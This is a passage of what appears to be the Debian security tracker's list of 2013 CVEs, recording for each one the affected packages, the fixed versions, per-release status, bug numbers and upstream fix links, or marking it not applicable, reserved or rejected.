	NOT-FOR-US: Symphony CMS
CVE-2013-7351 (Multiple cross-site scripting (XSS) vulnerabilities in index.php in Sh ...)
	- shaarli 0.0.41~beta~dfsg2-4 (bug #743252)
	NOTE: https://github.com/sebsauvage/Shaarli/commit/53da201749f8f362323ef278bf338f1d9f7a925a
CVE-2013-7348 (Double free vulnerability in the ioctx_alloc function in fs/aio.c in t ...)
	- linux 3.13.4-1
	[wheezy] - linux (Introduced and fixed in 3.13 series)
	- linux-2.6 (Introduced and fixed in 3.13 series)
	NOTE: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=d558023207e008a4476a3b7bb8706b2a2bf5d84f
CVE-2013-7347 (Luci in Red Hat Conga does not properly enforce the user session timeo ...)
	NOT-FOR-US: Red Hat Conga
CVE-2013-7344 (Unspecified vulnerability in core/settings.php in ownCloud before 4.0. ...)
	- owncloud 5.0.3+dfsg-1
CVE-2013-7343 (Cross-site scripting (XSS) vulnerability in flowplayer.swf in the Flas ...)
	NOT-FOR-US: Flowplayer
	NOTE: Present in the source in some Moodle packages, see #736800
CVE-2013-7342 (Cross-site scripting (XSS) vulnerability in flowplayer.swf in the Flas ...)
	NOT-FOR-US: Flowplayer
	NOTE: Present in the source in some Moodle packages, see #736800
CVE-2013-7340 (VideoLAN VLC Media Player before 2.0.7 allows remote attackers to caus ...)
	- vlc 2.2.0~rc2-1 (unimportant)
	NOTE: No security impact
	NOTE: Might be fixed earlier than 2.2.0~rc2, but only that version was checked
CVE-2013-7337
	RESERVED
CVE-2013-7341 (Multiple cross-site scripting (XSS) vulnerabilities in Flowplayer Flas ...)
	- moodle 2.6.2-1
	[squeeze] - moodle (Vulnerable code not present)
CVE-2013-7339 (The rds_ib_laddr_check function in net/rds/ib.c in the Linux kernel be ...)
	{DSA-2906-1}
	- linux 3.13-1
	[wheezy] - linux 3.2.57-1
	- linux-2.6
	NOTE: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=c2349758acf1874e4c2b93fe41d072336f1a31d0
CVE-2013-7336 (The qemuMigrationWaitForSpice function in qemu/qemu_migration.c in lib ...)
	- libvirt 1.1.4-1
	[wheezy] - libvirt (Vulnerable code not present)
	[squeeze] - libvirt (Vulnerable code not present)
	NOTE: http://www.redhat.com/archives/libvir-list/2013-September/msg01208.html
CVE-2013-7335 (Open redirect vulnerability in DotNetNuke (DNN) before 6.2.9 and 7.x b ...)
	NOT-FOR-US: DotNetNuke
CVE-2013-7334 (Cross-site request forgery (CSRF) vulnerability in ImageCMS before 4.2 ...)
	NOT-FOR-US: ImageCMS
CVE-2013-7333 (A vulnerability in version 0.90 of the Open Floodlight SDN controller ...)
	NOT-FOR-US: Open Floodlight
CVE-2013-7332 (The Microsoft.XMLDOM ActiveX control in Microsoft Windows 8.1 and earl ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-7331 (The Microsoft.XMLDOM ActiveX control in Microsoft Windows 8.1 and earl ...)
	NOT-FOR-US: Microsoft Windows
CVE-2013-7345 (The BEGIN regular expression in the awk script detector in magic/Magdi ...)
	{DSA-3064-1 DSA-2873-1}
	- file 1:5.17-0.1 (bug #703993)
	NOTE: http://bugs.gw.com/view.php?id=164
	NOTE: fixed in commit ef2329cf71acb59204dd981e2c6cce6c81fe467c
	- php5 5.6.0+dfsg-1
	[squeeze] - php5 (Vulnerable code not present)
	NOTE: Wheezy's php5 is vulnerable in 5.4.4-14+deb7u14. Verified by rebuilding
	NOTE: magic.mgc out of ext/fileinfo/data_info.c and "strings magic.mgc |grep BEGIN"
	NOTE: returns "^\s*BEGIN\s*[{]". Same test in squeeze does not
	NOTE: report the problematic string.
	NOTE: Good fix is to regenerate the file with "php5
	NOTE: create_data_file.php /usr/share/file/magic.mgc > data_info.c" once
	NOTE: you have a fixed libmagic1 installed.
	NOTE: fixed by php5 5.4.27 so DSA 3064-1 also fixed it in Wheezy
CVE-2013-7330 (Jenkins before 1.502 allows remote authenticated users to configure an ...)
	- jenkins 1.565.2-1 (bug #739067)
	NOTE: https://github.com/jenkinsci/jenkins/commit/36342d71e29e0620f803a7470ce96c61761648d8
CVE-2013-7328 (Multiple integer signedness errors in the gdImageCrop function in ext/ ...)
	- php5 5.5.9+dfsg-1
	[wheezy] - php5 (Vulnerable code was introduced in 5.5.0)
	[squeeze] - php5 (Vulnerable code was introduced in 5.5.0)
CVE-2013-7327 (The gdImageCrop function in ext/gd/gd.c in PHP 5.5.x before 5.5.9 does ...)
	- php5 5.5.9+dfsg-1
	[wheezy] - php5 (Vulnerable code was introduced in 5.5.0)
	[squeeze] - php5 (Vulnerable code was introduced in 5.5.0)
CVE-2013-7326 (Cross-site scripting (XSS) vulnerability in vTiger CRM 5.4.0 allows re ...)
	NOT-FOR-US: vTiger CRM
CVE-2013-7324 (Webkit-GTK 2.x (any version with HTML5 audio/video support based on GS ...)
	NOT-FOR-US: Historic webkit issue
CVE-2013-7329 (The CGI::Application module before 4.50_50 and 4.50_51 for Perl, when ...)
	- libcgi-application-perl 4.50-2 (bug #739505)
	[wheezy] - libcgi-application-perl (Minor issue)
	[squeeze] - libcgi-application-perl (Minor issue)
	NOTE: suggested fix https://github.com/markstos/CGI--Application/pull/15
CVE-2013-7325 (An issue exists in uscan in devscripts before 2.13.19, which could let ...)
	{DSA-2836-1}
	- devscripts 2.13.9
	[squeeze] - devscripts (Minor issue)
CVE-2013-7321 (Cross-site scripting (XSS) vulnerability in D-Link DAP-2253 Access Poi ...)
	NOT-FOR-US: D-Link hardware
CVE-2013-7320 (Cross-site request forgery (CSRF) vulnerability in D-Link DAP-2253 Acc ...)
	NOT-FOR-US: D-Link hardware
CVE-2013-7319 (Cross-site scripting (XSS) vulnerability in the Download Manager plugi ...)
	NOT-FOR-US: WordPress plugin Download Manager
CVE-2013-7322 (usersfile.c in liboath in OATH Toolkit before 2.4.1 does not properly ...)
	- oath-toolkit 2.4.1-1 (low; bug #738515)
	[wheezy] - oath-toolkit (Minor issue)
	NOTE: http://lists.nongnu.org/archive/html/oath-toolkit-help/2013-12/msg00000.html
CVE-2013-7338 (Python before 3.3.4 RC1 allows remote attackers to cause a denial of s ...)
	- python2.5 (Only affects 3.x)
	- python2.6 (Only affects 3.x)
	- python2.7 (Only affects 3.x)
	- python3.1 (low)
	[squeeze] - python3.1 (Minor issue)
	- python3.2 (low)
	[wheezy] - python3.2 (Minor issue)
	- python3.3 3.3.4-1 (low)
	- python3.4 3.4~b3-1 (low)
	NOTE: http://bugs.python.org/issue20078
CVE-2013-XXXX [libclamunrar: double-free error libclamunrar_iface/unrar_iface.c]
	- libclamunrar 0.97.7+dfsg-1 (bug #770647)
	[wheezy] - libclamunrar (Non-free not supported, also minor issue)
	NOTE: https://www.openwall.com/lists/oss-security/2013/11/29/6
CVE-2013-XXXX [staden-io-lib buffer overflow]
	- staden-io-lib 1.13.3-2 (low; bug #729276)
	[squeeze] - staden-io-lib (Minor issue)
	[wheezy] - staden-io-lib (Minor issue)
CVE-2013-XXXX [cakephp: local file inclusion]
	- cakephp (AssetDispatcher not present in 1.3)
	NOTE: http://web.archive.org/web/20140531064939/http://bakery.cakephp.org:80/articles/markstory/2013/07/18/cakephp_2_3_8_2_2_9_released
	NOTE: http://seclists.org/bugtraq/2013/Aug/97, needs a CVE assignment
CVE-2013-XXXX [automysqlbackup code injection]
	- automysqlbackup 2.6+debian.3-1 (bug #706099)
	[squeeze] - automysqlbackup (Minor issue)
CVE-2013-XXXX [autopostgresqlbackup code injection]
	- autopostgresqlbackup 1.0-2 (bug #706095)
CVE-2013-XXXX [buffer overflow in commandline parsing]
	- swath 0.4.3-3 (low; bug #698189)
	[squeeze] - swath 0.4.0-4+squeeze1
CVE-2013-7323 (python-gnupg before 0.3.5 allows context-dependent attackers to execut ...)
	{DSA-2946-1}
	- python-gnupg 0.3.6-1 (bug #738509)
CVE-2013-7318 (Cross-site scripting (XSS) vulnerability in BusinessFlow/login in Algo ...)
	NOT-FOR-US: AlgoSec Firewall Analyzer
CVE-2013-7317 (Multiple cross-site scripting (XSS) vulnerabilities in CS-Cart before ...)
	NOT-FOR-US: CS-Cart
CVE-2013-7316 (Cross-site scripting (XSS) vulnerability in GitLab 6.0 and other versi ...)
	- gitlab (Fixed before initial upload to Debian)
CVE-2013-7315 (The Spring MVC in Spring Framework before 3.2.4 and 4.0.0.M1 through 4 ...)
	{DSA-2842-1}
	- libspring-java 3.0.6.RELEASE-10 (low; bug #720902)
CVE-2013-7314 (The OSPF implementation on NEC IP38X, IX1000, IX2000, and IX3000 route ...)
	NOT-FOR-US: NEC routers
CVE-2013-7313 (The OSPF implementation in Juniper Junos through 13.x, JunosE, and Scr ...)
	NOT-FOR-US: Juniper Junos
CVE-2013-7312 (The OSPF implementation on Enterasys switches and routers does not con ...)
	NOT-FOR-US: Enterasys switches and routers
CVE-2013-7311 (The OSPF implementation in Check Point Gaia OS R75.X and R76 and IPSO ...)
	NOT-FOR-US: Check Point Gaia OS
CVE-2013-7310 (The OSPF implementation on Yamaha routers does not consider the possib ...)
	NOT-FOR-US: Yamaha routers
CVE-2013-7309 (The OSPF implementation in Extreme Networks EXOS does not consider the ...)
	NOT-FOR-US: Extreme Networks EXOS
CVE-2013-7308 (The OSPF implementation on the D-Link DES-3810-28 switch with firmware ...)
	NOT-FOR-US: D-Link DES-3810-28 switch
CVE-2013-7307 (The OSPF implementation on the Brocade Vyatta vRouter with software be ...)
	NOT-FOR-US: Brocade Vyatta vRouter
CVE-2013-7306 (The OSPF implementation on Brocade routers does not consider the possi ...)
	NOT-FOR-US: Brocade routers
CVE-2013-7305 (fpw.php in e107 through 1.0.4 does not check the user_ban field, which ...)
	NOT-FOR-US: e107
CVE-2013-7304 (Check Point Endpoint Security MI Server through R73 3.0.0 HFA2.5 does ...)
	NOT-FOR-US: Check Point Endpoint Security MI Server
CVE-2013-7297
	RESERVED
CVE-2013-7295 (Tor before 0.2.4.20, when OpenSSL 1.x is used in conjunction with a ce ...)
	- tor 0.2.4.20-1 (low)
	[wheezy] - tor (Minor issue)
	[squeeze] - tor (OpenSSL in oldstable not affected)
CVE-2013-7303 (Multiple cross-site scripting (XSS) vulnerabilities in (1) squelettes- ...)
	- spip 3.0.13-1 (bug #736170)
	[wheezy] - spip 2.1.17-1+deb7u3
	[squeeze] - spip (Not supported in Squeeze LTS)
CVE-2013-7302 (Session fixation vulnerability in the Ubercart module 6.x-2.x before 6 ...)
	NOT-FOR-US: Drupal contrib
CVE-2013-7301 (Cantata before 1.2.2 does not restrict access to files in the play que ...)
	- cantata (Vulnerable code introduced with 1.2.0; bug #736154)
	NOTE: https://code.google.com/p/cantata/issues/detail?id=356
CVE-2013-7300 (Absolute path traversal vulnerability in cantata before 1.2.2 allows l ...)
	- cantata (Vulnerable code introduced with 1.2.0; bug #736154)
	NOTE: https://code.google.com/p/cantata/issues/detail?id=356
CVE-2013-7299 (framework/common/messageheaderparser.cpp in Tntnet before 2.2.1 allows ...)
	- tntnet 2.2.1-1 (low; bug #735881)
	[wheezy] - tntnet (Minor issue)
	[squeeze] - tntnet (Minor issue)
CVE-2013-7298 (query_params.cpp in cxxtools before 2.2.1 allows remote attackers to c ...)
	- cxxtools 2.2.1-1 (low; bug #735880)
	[wheezy] - cxxtools (Issue not present, introduced in v2.2)
	[squeeze] - cxxtools (Issue not present, introduced in v2.2)
CVE-2013-7296 (The JBIG2Stream::readSegments method in JBIG2Stream.cc in Poppler befo ...)
	- poppler (Introduced in a3cee0e7e9dd292c70fe1fa19a92e70bbc1e1b41)
	NOTE: http://cgit.freedesktop.org/poppler/poppler/commit/?id=58e04a08afee
	NOTE: https://bugs.kde.org/show_bug.cgi?id=328511
CVE-2013-7294 (The ikev2parent_inI1outR1 function in pluto/ikev2_parent.c in libreswa ...)
	NOT-FOR-US: libreswan, strongSwan not affected (pluto never supported ikev2)
CVE-2013-7293 (The ASUS WL-330NUL router has a configuration process that relies on a ...)
	NOT-FOR-US: ASUS router
CVE-2013-7292 (VASCO IDENTIKEY Authentication Server (IAS) 3.4.x allows remote authen ...)
	NOT-FOR-US: VASCO IAS
CVE-2013-7291 (memcached before 1.4.17, when running in verbose mode, allows remote a ...)
	{DLA-701-1}
	- memcached 1.4.20-1 (low; bug #735314)
	[squeeze] - memcached (Minor issue)
	NOTE: https://github.com/memcached/memcached/commit/fbe823d9a61b5149cd6e3b5e17bd28dd3b8dd760
CVE-2013-7290 (The do_item_get function in items.c in memcached 1.4.4 and other versi ...)
	- memcached 1.4.13-0.2
	[squeeze] - memcached 1.4.5-1+deb6u1
	NOTE: https://github.com/memcached/memcached/commit/fbe823d9a61b5149cd6e3b5e17bd28dd3b8dd760
	NOTE: actual patch should be adjusted in case there is a further memcached upload according to upstream commit
CVE-2013-7289 (Multiple cross-site scripting (XSS) vulnerabilities in register.php in ...)
	NOT-FOR-US: Andy's PHP Knowledgebase (Aphpkb)
CVE-2013-7287 (MobileIron VSP < 5.9.1 and Sentry < 5.0 has an insecure encrypti ...)
	NOT-FOR-US: MobileIron
CVE-2013-7286 (MobileIron VSP < 5.9.1 and Sentry < 5.0 has a weak password obfu ...)
	NOT-FOR-US: MobileIron
CVE-2013-7283 (Race condition in the libreswan.spec files for Red Hat Enterprise Linu ...)
	- libreswan (Fixed before initial upload in Debian; /tmp-race in libreswan.spec for rpm based systems)
CVE-2013-7282 (The management web interface on the Nisuta NS-WIR150NE router with fir ...)
	NOT-FOR-US: Nisuta NS-WIR150NE router
CVE-2013-7280 (Buffer overflow in HansoTools Hanso Player 2.1.0, 2.5.0, and earlier a ...)
	NOT-FOR-US: HansoTools Hanso Player
CVE-2013-7279 (Cross-site scripting (XSS) vulnerability in views/video-management/pre ...)
	NOT-FOR-US: WordPress plugin S3 Video
CVE-2013-7278 (SQL injection vulnerability in Naxtech CMS Afroditi 1.0 allows remote ...)
	NOT-FOR-US: Naxtech CMS Afroditi
CVE-2013-7277 (Multiple cross-site scripting (XSS) vulnerabilities in Andy's PHP Know ...)
	NOT-FOR-US: Andy's PHP Knowledgebase (Aphpkb)
CVE-2013-7276 (Cross-site scripting (XSS) vulnerability in inc/raf_form.php in the Re ...)
	NOT-FOR-US: WordPress plugin Recommend to a friend
CVE-2013-7275 (Cross-site scripting (XSS) vulnerability in misc.php in MyBB (aka MyBu ...)
	NOT-FOR-US: MyBB
CVE-2013-7274 (Cross-site scripting (XSS) vulnerability in Wallpaper Script 3.5.0082 ...)
	NOT-FOR-US: Wallpaper Script
CVE-2013-7272
	RESERVED
CVE-2013-7288 (Cross-site scripting (XSS) vulnerability in the mycode_parse_video fun ...)
	NOT-FOR-US: MyBB (aka MyBulletinBoard)
CVE-2013-7285 (Xstream API versions up to 1.4.6 and version 1.4.10, if the security f ...)
	- libxstream-java 1.4.7-1 (bug #734821)
	[wheezy] - libxstream-java (Vulnerability introduced in 1.4.5)
	[squeeze] - libxstream-java (Vulnerability introduced in 1.4.5)
	NOTE: http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html
	NOTE: http://markmail.org/message/kfqoqdfj5fnup5co?q=list:org.codehaus.xstream.dev&page=3
	NOTE: initial patch: https://fisheye.codehaus.org/changelog/xstream?cs=2210
CVE-2013-7284 (The PlRPC module, possibly 0.2020 and earlier, for Perl uses the Stora ...)
	- libplrpc-perl (high; bug #734789)
	[squeeze] - libplrpc-perl (Unsupported in squeeze-lts)
	NOTE: Upstream appears dead.
CVE-2013-7273 (GNOME Display Manager (gdm) 3.4.1 and earlier, when disable-user-list ...)
	- gdm3 3.8.3-1 (low; bug #683338)
	[wheezy] - gdm3 (Minor issue)
	[squeeze] - gdm3 (Vulnerable code not present)
CVE-2013-7271 (The x25_recvmsg function in net/x25/af_x25.c in the Linux kernel befor ...)
	- linux-2.6
	[squeeze] - linux-2.6 (Too intrusive to backport)
	- linux 3.12.6-1
	[wheezy] - linux 3.2.54-1
	NOTE: upstream fix: https://git.kernel.org/linus/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c
	NOTE: included in https://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.12.4
CVE-2013-7270 (The packet_recvmsg function in net/packet/af_packet.c in the Linux ker ...)
	- linux-2.6
	[squeeze] - linux-2.6 (Too intrusive to backport)
	- linux 3.12.6-1
	[wheezy] - linux 3.2.54-1
	NOTE: upstream fix: https://git.kernel.org/linus/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c
	NOTE: included in https://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.12.4
CVE-2013-7269 (The nr_recvmsg function in net/netrom/af_netrom.c in the Linux kernel ...)
	- linux-2.6
	[squeeze] - linux-2.6 (Too intrusive to backport)
	- linux 3.12.6-1
	[wheezy] - linux 3.2.54-1
	NOTE: upstream fix: https://git.kernel.org/linus/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c
	NOTE: included in https://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.12.4
CVE-2013-7268 (The ipx_recvmsg function in net/ipx/af_ipx.c in the Linux kernel befor ...)
	- linux-2.6
	[squeeze] - linux-2.6 (Too intrusive to backport)
	- linux 3.12.6-1
	[wheezy] - linux 3.2.54-1
	NOTE: upstream fix: https://git.kernel.org/linus/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c
	NOTE: included in https://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.12.4
CVE-2013-7267 (The atalk_recvmsg function in net/appletalk/ddp.c in the Linux kernel ...)
	- linux-2.6
	[squeeze] - linux-2.6 (Too intrusive to backport)
	- linux 3.12.6-1
	[wheezy] - linux 3.2.54-1
	NOTE: upstream fix: https://git.kernel.org/linus/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c
	NOTE: included in https://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.12.4
CVE-2013-7266 (The mISDN_sock_recvmsg function in drivers/isdn/mISDN/socket.c in the ...)
	{DLA-103-1}
	- linux-2.6
	[squeeze] - linux-2.6 (Too intrusive to backport)
	- linux 3.12.6-1
	[wheezy] - linux 3.2.54-1
	NOTE: upstream fix: https://git.kernel.org/linus/f3d3342602f8bcbf37d7c46641cb9bca7618eb1c
	NOTE: included in https://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.12.4
CVE-2013-7262 (SQL injection vulnerability in the msPostGISLayerSetTimeFilter functio ...)
	- mapserver 6.4.1-1 (low; bug #734565)
	[wheezy] - mapserver 6.0.1-3.2+deb7u2
	[squeeze] - mapserver 5.6.5-2+squeeze3
	NOTE: https://github.com/mapserver/mapserver/issues/4834
CVE-2013-7261
	RESERVED
CVE-2013-7260 (Multiple stack-based buffer overflows in RealNetworks RealPlayer befor ...)
	NOT-FOR-US: RealPlayer
CVE-2013-7281 (The dgram_recvmsg function in net/ieee802154/dgram.c in the Linux kern ...)
	- linux-2.6 (Introduced in 3.10)
	- linux 3.12.6-1 (low)
	[wheezy] - linux (Introduced in 3.10)
CVE-2013-7265 (The pn_recvmsg function in net/phonet/datagram.c in the Linux kernel b ...)
	{DSA-2906-1}
	- linux-2.6 (low)
	[wheezy] - linux 3.2.54-1
	- linux 3.12.6-1 (low)
CVE-2013-7264 (The l2tp_ip_recvmsg function in net/l2tp/l2tp_ip.c in the Linux kernel ...)
	{DSA-2906-1}
	- linux-2.6 (low)
	[wheezy] - linux 3.2.54-1
	- linux 3.12.6-1 (low)
CVE-2013-7263 (The Linux kernel before 3.12.4 updates certain length values before en ...)
	{DSA-2906-1}
	- linux-2.6 (low)
	- linux 3.12.6-1 (low)
	[wheezy] - linux 3.2.54-1 (low)
CVE-2013-7251 (Multiple cross-site request forgery (CSRF) vulnerabilities in ProjectF ...)
	NOT-FOR-US: ProjectForge
CVE-2013-7250 (Cross-site scripting (XSS) vulnerability in the JsonBuilder implementa ...)
	NOT-FOR-US: ProjectForge
CVE-2013-7248 (Franklin Fueling Systems TS-550 evo with firmware 2.0.0.6833 and other ...)
	NOT-FOR-US: Franklin Fueling Systems TS-550
CVE-2013-7247 (cgi-bin/tsaws.cgi in Franklin Fueling Systems TS-550 evo with firmware ...)
	NOT-FOR-US: Franklin Fueling Systems TS-550
CVE-2013-7246 (Buffer overflow in the IconCreate method in an ActiveX control in the ...)
	NOT-FOR-US: DaumGame ActiveX plugin
CVE-2013-7245 (The Backup Server component in SAP Sybase ASE 15.7 before SP51 allows ...)
	NOT-FOR-US: SAP Sybase ASE
CVE-2013-7244
	RESERVED
CVE-2013-7243 (Multiple cross-site scripting (XSS) vulnerabilities in GetSimple CMS 3 ...)
	NOT-FOR-US: GetSimple CMS
CVE-2013-7238
	RESERVED
CVE-2013-7237
	RESERVED
CVE-2013-7259 (Multiple cross-site request forgery (CSRF) vulnerabilities in Neo4J 1. ...)
	- neo4j-community (bug #685615)
	NOTE: http://blog.diniscruz.com/2013/08/neo4j-csrf-payload-to-start-processes.html
CVE-2013-7258 (Cross-site scripting (XSS) vulnerability in web2ldap 1.1.x before 1.1. ...)
	- web2ldap (low; bug #734107)
CVE-2013-7257 (Cross-site scripting (XSS) vulnerability in Codiad 2.0.7 allows remote ...)
	NOT-FOR-US: Codiad
CVE-2013-7256 (Cross-site request forgery (CSRF) vulnerability in Opsview before 4.4. ...)
	NOT-FOR-US: Ops View
CVE-2013-7255 (Open redirect vulnerability in Opsview before 4.4.2 allows remote atta ...)
	NOT-FOR-US: Ops View
CVE-2013-7254 (Cross-site scripting (XSS) vulnerability in Opsview before 4.4.2 allow ...)
	NOT-FOR-US: Ops View
CVE-2013-7253
	RESERVED
CVE-2013-7252 (kwalletd in KWallet before KDE Applications 14.12.0 uses Blowfish with ...)
	- kde-runtime 4:4.12.2-1
	[wheezy] - kde-runtime (4.12 introduces a GnuPG backend, no backport planned)
	- kdebase-runtime
	[squeeze] - kdebase-runtime (4.12 introduces a GnuPG backend, no backport planned)
	NOTE: http://gaganpreet.in/blog/2013/07/24/kwallet-security-analysis/
	NOTE: Upstream advisory: https://www.kde.org/info/security/advisory-20150109-1.txt
CVE-2013-7233 (Cross-site request forgery (CSRF) vulnerability in the retrospam compo ...)
	- wordpress (unimportant)
	NOTE: issue only allows comments from posts to be moved to "needs moderation" list
CVE-2013-7232 (SQL injection vulnerability in ESRI ArcGIS for Server through 10.2 all ...)
	NOT-FOR-US: ESRI ArcGIS
CVE-2013-7231 (Cross-site scripting (XSS) vulnerability in the Mobile Content Server ...)
	NOT-FOR-US: ESRI ArcGIS
CVE-2013-7230
	RESERVED
CVE-2013-7229
	RESERVED
CVE-2013-7228
	RESERVED
CVE-2013-7227
	RESERVED
CVE-2013-7226 (Integer overflow in the gdImageCrop function in ext/gd/gd.c in PHP 5.5 ...)
	- php5 5.5.9+dfsg-1
	[wheezy] - php5 (Vulnerable code was introduced in 5.5.0)
	[squeeze] - php5 (Vulnerable code was introduced in 5.5.0)
	NOTE: https://bugs.php.net/bug.php?id=66356
	NOTE: http://www.php.net/manual/en/function.imagecrop.php
CVE-2013-7219 (SQL injection vulnerability in vote.php in the 2Glux Sexy Polling (com ...)
	NOT-FOR-US: Joomla component com_sexypolling
CVE-2013-7218
	RESERVED
CVE-2013-7217 (Unspecified vulnerability in Zimbra Collaboration Server 7.2.5 and ear ...)
	NOT-FOR-US: Zimbra
CVE-2013-7216 (Multiple SQL injection vulnerabilities in Classifieds Creator 2.0 allo ...)
	NOT-FOR-US: Classifieds Creator
CVE-2013-7215
	RESERVED
CVE-2013-7214
	RESERVED
CVE-2013-7213
	RESERVED
CVE-2013-7212
	RESERVED
CVE-2013-7211
	RESERVED
CVE-2013-7210
	RESERVED
CVE-2013-7209 (Cross-site request forgery (CSRF) vulnerability in admBase/login.page ...)
	NOT-FOR-US: jForum
CVE-2013-7208
	RESERVED
CVE-2013-7207
	RESERVED
CVE-2013-7206
	RESERVED
CVE-2013-7204 (Cross-site request forgery (CSRF) vulnerability in set_users.cgi in Co ...)
	NOT-FOR-US: Conceptronic CIPCAMPTIWL Camera
CVE-2013-7202 (The WebHybridClient class in PayPal 5.3 and earlier for Android allows ...)
	NOT-FOR-US: Paypal for Android
CVE-2013-7201 (WebHybridClient.java in PayPal 5.3 and earlier for Android ignores SSL ...)
	NOT-FOR-US: Paypal for Android
CVE-2013-7200
	RESERVED
CVE-2013-7199
	RESERVED
CVE-2013-7198
	RESERVED
CVE-2013-7197
	RESERVED
CVE-2013-7196 (static/ajax.php in PHPFox 3.7.3, 3.7.4, and 3.7.5 allows remote authen ...)
	NOT-FOR-US: PHPFox
CVE-2013-7195 (PHPFox 3.7.3 and 3.7.4 allows remote authenticated users to bypass int ...)
	NOT-FOR-US: PHPFox
CVE-2013-7194 (Multiple cross-site scripting (XSS) vulnerabilities in www/administrat ...)
	NOT-FOR-US: eFront
CVE-2013-7193 (Multiple SQL injection vulnerabilities in C2C Forward Auction Creator ...)
	NOT-FOR-US: C2C Forward Auction Creator
CVE-2013-7192 (Multiple SQL injection vulnerabilities in Dynamic Biz Website Builder ...)
	NOT-FOR-US: Dynamic Biz Website Builder
CVE-2013-7190 (Multiple directory traversal vulnerabilities in iScripts AutoHoster, p ...)
	NOT-FOR-US: iScripts AutoHoster
CVE-2013-7186 (Buffer overflow in Steinberg MyMp3PRO 5.0 (Build 5.1.0.21) allows remo ...)
	NOT-FOR-US: Steinberg MyMp3PRO
CVE-2013-7185 (PotPlayer 1.5.40688: .avi File Memory Corruption ...)
	NOT-FOR-US: PotPlayer
CVE-2013-7184 (Gretech GOM Media Player 2.2.56.5158 and earlier allows remote attacke ...)
	NOT-FOR-US: Gretech GOM Media Player
CVE-2013-7183 (cgi-bin/reboot.cgi on Seowon Intech SWC-9100 routers allows remote att ...)
	NOT-FOR-US: Seowon Intech SWC-9100
CVE-2013-7182 (Cross-site scripting (XSS) vulnerability in firewall/schedule/recurrdl ...)
	NOT-FOR-US: Fortinet FortiOS
CVE-2013-7181 (Cross-site scripting (XSS) vulnerability in user/ldap_user/add in Fort ...)
	NOT-FOR-US: FortiWeb
CVE-2013-7180 (Cobham SAILOR 900 VSAT; SAILOR FleetBroadBand 150, 250, and 500; EXPLO ...)
	NOT-FOR-US: Cobham
CVE-2013-7179 (The ping functionality in cgi-bin/diagnostic.cgi on Seowon Intech SWC- ...)
	NOT-FOR-US: Seowon Intech SWC-9100 routers
CVE-2013-7178
	RESERVED
CVE-2013-7177 (config/filter.d/cyrus-imap.conf in the cyrus-imap filter in Fail2ban b ...)
	{DSA-2979-1 DLA-0021-1}
	- fail2ban 0.8.11-1
	[squeeze] - fail2ban 0.8.4-3+squeeze3
	NOTE: https://github.com/fail2ban/fail2ban/commit/bd175f026737d66e7110868fb50b3760ff75e087
CVE-2013-7176 (config/filter.d/postfix.conf in the postfix filter in Fail2ban before ...)
	{DSA-2979-1 DLA-0021-1}
	- fail2ban 0.8.11-1
	[squeeze] - fail2ban 0.8.4-3+squeeze3
CVE-2013-7175 (Multiple SQL injection vulnerabilities in Avanset Visual CertExam Mana ...)
	NOT-FOR-US: Avanset Visual CertExam Manager
CVE-2013-7174 (Absolute path traversal vulnerability in cgi-bin/jc.cgi in QNAP QTS be ...)
	NOT-FOR-US: QNAP QTS
CVE-2013-7173 (Belkin n750 routers have a buffer overflow. ...)
	NOT-FOR-US: Belkin
CVE-2013-7172 (Slackware 13.1, 13.37, 14.0 and 14.1 contain world-writable permission ...)
	- libiodbc2 (RPATH issue slackware specific)
CVE-2013-7171 (Slackware 14.0 and 14.1, and Slackware LLVM 3.0-i486-2 and 3.3-i486-2, ...)
	- llvm-2.9 (RPATH issue slackware specific)
	- llvm-3.0 (RPATH issue slackware specific)
	- llvm-3.1 (RPATH issue slackware specific)
	- llvm-toolchain-3.2 (RPATH issue slackware specific)
	- llvm-toolchain-3.3 (RPATH issue slackware specific)
	- llvm-toolchain-3.4 (RPATH issue slackware specific)
	- llvm-toolchain-snapshot (RPATH issue slackware specific)
CVE-2013-7170
	RESERVED
CVE-2013-7169
	REJECTED
CVE-2013-7168
	REJECTED
CVE-2013-7167
	REJECTED
CVE-2013-7166
	REJECTED
CVE-2013-7165
	REJECTED
CVE-2013-7164
	REJECTED
CVE-2013-7163
	RESERVED
CVE-2013-7162
	RESERVED
CVE-2013-7161
	RESERVED
CVE-2013-7160
	RESERVED
CVE-2013-7159
	RESERVED
CVE-2013-7158
	RESERVED
CVE-2013-7157
	RESERVED
CVE-2013-7156
	RESERVED
CVE-2013-7155
	RESERVED
CVE-2013-7154
	RESERVED
CVE-2013-7153
	RESERVED
CVE-2013-7152
	RESERVED
CVE-2013-7151
	RESERVED
CVE-2013-7150
	RESERVED
CVE-2013-7249 (Fat Free CRM before 0.12.1 does not restrict XML serialization, which ...)
	NOT-FOR-US: Fat Free CRM
CVE-2013-7242 (SQL injection vulnerability in zp-core/zp-extensions/wordpress_import. ...)
	NOT-FOR-US: Zenphoto
CVE-2013-7241 (Cross-site scripting (XSS) vulnerability in the export function in zp- ...)
	NOT-FOR-US: Zenphoto
CVE-2013-7240 (Directory traversal vulnerability in download-file.php in the Advanced ...)
	NOT-FOR-US: Dewplayer
CVE-2013-7239 (memcached before 1.4.17 allows remote attackers to bypass authenticati ...)
	{DSA-2832-1}
	- memcached 1.4.13-0.3 (bug #733643)
	[squeeze] - memcached (vulnerable code present, but SASL authentication support not enabled)
	NOTE: https://code.google.com/p/memcached/wiki/ReleaseNotes1417
	NOTE: https://code.google.com/p/memcached/issues/detail?id=316
	NOTE: https://github.com/memcached/memcached/commit/87c1cf0f20be20608d3becf854e9cf0910f4ad32
CVE-2013-7236 (Simple Machines Forum (SMF) 2.0.6, 1.1.19, and earlier allows remote a ...)
	NOT-FOR-US: Simple Machines Forum
CVE-2013-7235 (Simple Machines Forum (SMF) before 1.1.19 and 2.x before 2.0.6 allows ...)
